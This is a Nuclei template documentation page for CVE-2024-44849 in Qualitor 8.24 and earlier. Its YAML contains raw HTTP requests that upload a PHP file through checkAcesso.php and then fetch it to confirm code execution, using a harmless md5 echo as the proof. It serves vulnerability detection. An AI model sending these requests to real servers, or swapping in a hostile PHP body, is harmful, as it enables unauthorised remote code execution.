Skip to content
Nuclei Templates

Qualitor <= 8.24 - Remote Code Execution

ID: CVE-2024-44849

Severity: critical

Author: s4e-io

Tags: cve,cve2024,rce,file-upload,qualitor,intrusive

Description

Section titled “Description”

Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.

YAML Source

Section titled “YAML Source”
id: CVE-2024-44849


info:
  name: Qualitor <= 8.24 - Remote Code Execution
  author: s4e-io
  severity: critical
  description: |
    Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.
  reference:
    - https://cvefeed.io/vuln/detail/CVE-2024-44849
    - https://nvd.nist.gov/vuln/detail/CVE-2024-44849
    - https://github.com/extencil/CVE-2024-44849
    - https://blog.extencil.me/information-security/cves/cve-2024-44849
    - https://sploitus.com/exploit?id=D08D686E-7910-5E17-99CC-36407B9884B8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-44849
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 2
    vendor: qualitor
    product: qualitor
    fofa-query: "Qualitor"
  tags: cve,cve2024,rce,file-upload,qualitor,intrusive


variables:
  filename: "{{rand_base(12)}}"
  num: "{{rand_int(1000, 9999)}}"


flow: http(1) && http(2)


http:
  - raw:
      - |
        POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849


        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="idtipo"


        2
        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="nmfilestorage"




        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="nmdiretoriorede"


        .
        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="nmbucket"




        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="nmaccesskey"




        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="nmkeyid"




        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="fleArquivo"; filename="{{filename}}.php"


        <?php echo md5({{num}}); ?>
        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="cdfilestorage"




        -----------------------------QUALITORspaceCVEspace2024space44849--


    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "parent.showQAlert(\'Upload", "showQAlert")
          - status_code == 200
        condition: and
        internal: true


  - raw:
      - |
        GET /html/ad/adfilestorage/request/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"{{md5(num)}}")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502201a98262b8da6b4c4b9075a5db6c69068d12e0757d69383b6a6c56a2e17ab2083022100a5fc25b1068613fcf9c7468c43964756f9142e563a34598375d8aeb94162ba04:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-44849.yaml"

View on Github